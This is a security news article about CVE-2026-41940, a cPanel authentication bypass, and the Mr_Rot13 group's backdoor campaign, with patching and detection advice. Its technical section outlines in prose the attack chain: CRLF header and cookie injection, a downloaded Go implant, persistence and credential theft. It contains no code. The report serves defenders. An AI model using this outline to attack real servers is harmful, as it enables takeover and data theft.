Mr_Rot13 exploits critical flaw in cPanel and installs silent backdoor
A serious flaw in cPanel is being exploited by a group of hackers that has been operating almost unnoticed for years. CVE-2026-41940 allows attackers to take control of hosting panels without a password. Thousands of servers have already been affected.
If you manage Linux servers with cPanel, you need to act now. The problem isn't just theoretical: groups like Mr_Rot13 are deploying persistent remote access tools.
- CVE-2026-41940 is a critical authentication bypass (CVSS 9.8) that does not require credentials.
- The Mr_Rot13 group uses the flaw to install the Filemanager backdoor and steal credentials.
- More than 2,000 different IPs have already been seen exploiting the vulnerability globally.
- Official cPanel updates are now available and cover most servers.
- Servers not updated remain at high risk of complete takeover.
How CVE-2026-41940 allows passwordless access
The vulnerability arises in the way cPanel manages sessions. A code path that handles basic authentication does not properly sanitize data, allowing an attacker to inject malicious information via HTTP headers.
With a specially constructed request, the attacker can create a valid session as an administrator without ever providing a login or password. This gives full access to WHM and all hosted accounts.
The profile of the group Mr_Rot13 and its tactics
Mr_Rot13 is not an opportunistic script kiddie. They have been operating since at least 2020, with a low detection rate in security tools. They use ROT13 encoding to hide command and control addresses, and Telegram channels for data exfiltration.
After gaining access via CVE-2026-41940, the group deploys a Go infector that changes root password, adds SSH keys and installs webshells. The objective is to maintain access for the long term.
Technical analysis of the exploitation chain
- Bypass authentication: Manipulation of whostmgrsession cookies and Authorization headers with CRLF injection.
- Payload deployment: Shell script downloads a Go binary that runs silently with nohup.
- Multiple persistence: Modification of root password, SSH key and JavaScript injection on login page.
- Data theft: Collection of bash history, database passwords and configs, sent to remote servers.
- Main backdoor: Filemanager, cross-platform web tool for remote file management and command execution.
Two important insights: consistent use of old infrastructure shows long-term planning, and the combination of multiple persistence methods makes removal much more complex than a simple patch.
Mr_Rot13 versus other active attacks
| Group / Activity | Main Focus | Persistence | Sophistication Level |
|---|---|---|---|
| Mr_Rot13 | Filemanager backdoor + credential theft | High (SSH, PHP, JS, root password) | High - has been operating for 6 years |
| Generic miners | Cryptocurrencies | Average | Lower the Average |
| Opportunistic ransomware | Fast encryption | Low | Average |
| Botnets | Propagation | Average | Low |
Risks and limitations of current protection
Even with the patch applied, servers that were exposed before the update may already be compromised. The official cPanel detection script helps, but doesn't always catch all artifacts.
Main risks: loss of customer data, use of the server in larger attacks, damage to hosting reputation and difficulty in completely removing Filemanager. Unsupported legacy servers are backported but require extra attention.
Practical immediate protection measures
Update cPanel to patched versions as soon as possible. Block external access to cpsrvd when not necessary and apply recommended ModSecurity rules.
Run the official detection script, change all root passwords and review authorized SSH keys. Consider restricting administrative access by IP.
My final opinion on this case
This incident shows how a single critical flaw in a widely used tool can expose entire infrastructures. Mr_Rot13 didn't invent anything revolutionary, but he combined patience, good opsec, and opportunistic exploitation effectively.
Administrators and hosting companies need to treat security updates as a top priority, not a routine task. Ignoring this now means paying a high price later.
The Future of Security in Hosting Panels
CVE-2026-41940 served as a strong warning for the cPanel ecosystem. With more than 98% of servers now updated, the focus must shift to detecting previous compromises and strengthening layered defenses.
Groups like Mr_Rot13 will continue to evolve. The best defense remains rapid updating, active monitoring, and reducing the attack surface. Those who act now will be well positioned for the next big incident.
Official Sources
QiAnXin XLab Official Report (primary source)
https://blog.xlab.qianxin.com/mr_rot13-the-elusive-6-year-hacker-group-weaponizing-critical-cpanel-flaws-for-backdoor-deployment/
This is QiAnXin XLab's original detailed report on Mr_Rot13 and the CVE-2026-41940 exploit.
cPanel Security Advisory (vendor official)
https://www.cpanel.net/blog/security/security-update-cve-2026-41940/
cPanel Support - Security Update CVE-2026-41940
https://support.cpanel.net/hc/en-us/articles/40073787579671-Security-CVE-2026-41940-cPanel-WHM-WP2-Security-Update-04-28-2026
